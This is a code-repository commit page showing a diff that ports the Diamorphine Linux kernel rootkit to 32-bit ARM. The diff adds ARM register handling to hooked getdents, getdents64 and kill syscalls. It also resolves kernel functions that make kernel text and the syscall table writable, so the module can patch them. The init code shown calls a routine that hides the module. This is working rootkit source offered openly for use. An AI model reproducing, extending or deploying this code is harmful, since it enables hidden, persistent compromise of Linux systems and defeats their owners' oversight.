Diamorphine ported to ARM

Syscall params modified to match the pt_regs struct of ARM Write protection extended, the set_kernel_text functions cover the syscall table too Tested on 5.1.0 armv7l
m0nad · Apr 20, 2021 · b382a67 · b382a67
1 parent e4708b4
commit b382a67
Showing 1 changed file with 20 additions and 2 deletions.
diff --git a/diamorphine.c b/diamorphine.c
@@ -38,6 +38,9 @@ void (*update_mapping_prot)(phys_addr_t phys, unsigned long virt, phys_addr_t si
 unsigned long start_rodata;
 unsigned long init_begin;
 #define section_size init_begin - start_rodata
+#elif IS_ENABLED(CONFIG_ARM)
+void (*set_kernel_text_rw)(void);
+void (*set_kernel_text_ro)(void);
 #endif
 static unsigned long *__sys_call_table;
 #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
@@ -111,6 +114,9 @@ static asmlinkage long hacked_getdents64(const struct pt_regs *pt_regs) {
 #elif IS_ENABLED(CONFIG_ARM64)
 	int fd = (int) pt_regs->regs[0];
 	struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1];
+#elif IS_ENABLED(CONFIG_ARM)
+	int fd = (int) pt_regs->uregs[0];
+	struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->uregs[1];
 #endif
 	int ret = orig_getdents64(pt_regs), err;
 #else
@@ -175,8 +181,11 @@ static asmlinkage long hacked_getdents(const struct pt_regs *pt_regs) {
 	int fd = (int) pt_regs->di;
 	struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si;
 #elif IS_ENABLED(CONFIG_ARM64)
-		int fd = (int) pt_regs->regs[0];
+	int fd = (int) pt_regs->regs[0];
 	struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1];
+#elif IS_ENABLED(CONFIG_ARM)
+	int fd = (int) pt_regs->uregs[0];
+	struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->uregs[1];
 #endif
 	int ret = orig_getdents(pt_regs), err;
 #else
@@ -300,6 +309,9 @@ hacked_kill(const struct pt_regs *pt_regs)
 #elif IS_ENABLED(CONFIG_ARM64)
 	pid_t pid = (pid_t) pt_regs->regs[0];
 	int sig = (int) pt_regs->regs[1];
+#elif IS_ENABLED(CONFIG_ARM)
+	pid_t pid = (pid_t) pt_regs->uregs[0];
+	int sig = (int) pt_regs->uregs[1];
 #endif
 #else
 asmlinkage int
@@ -354,7 +366,8 @@ protect_memory(void)
 #elif IS_ENABLED(CONFIG_ARM64)
 	update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata,
 			section_size, PAGE_KERNEL_RO);
-
+#elif IS_ENABLED(CONFIG_ARM)
+	set_kernel_text_ro();
 #endif
 }
 
@@ -370,6 +383,8 @@ unprotect_memory(void)
 #elif IS_ENABLED(CONFIG_ARM64)
 	update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata,
 			section_size, PAGE_KERNEL);
+#elif IS_ENABLED(CONFIG_ARM)
+	set_kernel_text_rw();
 #endif
 }
 
@@ -386,6 +401,9 @@ diamorphine_init(void)
 	update_mapping_prot = (void *)kallsyms_lookup_name("update_mapping_prot");
 	start_rodata = (unsigned long)kallsyms_lookup_name("__start_rodata");
 	init_begin = (unsigned long)kallsyms_lookup_name("__init_begin");
+#elif IS_ENABLED(CONFIG_ARM)
+	set_kernel_text_rw = (void *)kallsyms_lookup_name("set_kernel_text_rw");
+	set_kernel_text_ro = (void *)kallsyms_lookup_name("set_kernel_text_ro");
 #endif
 
 	module_hide();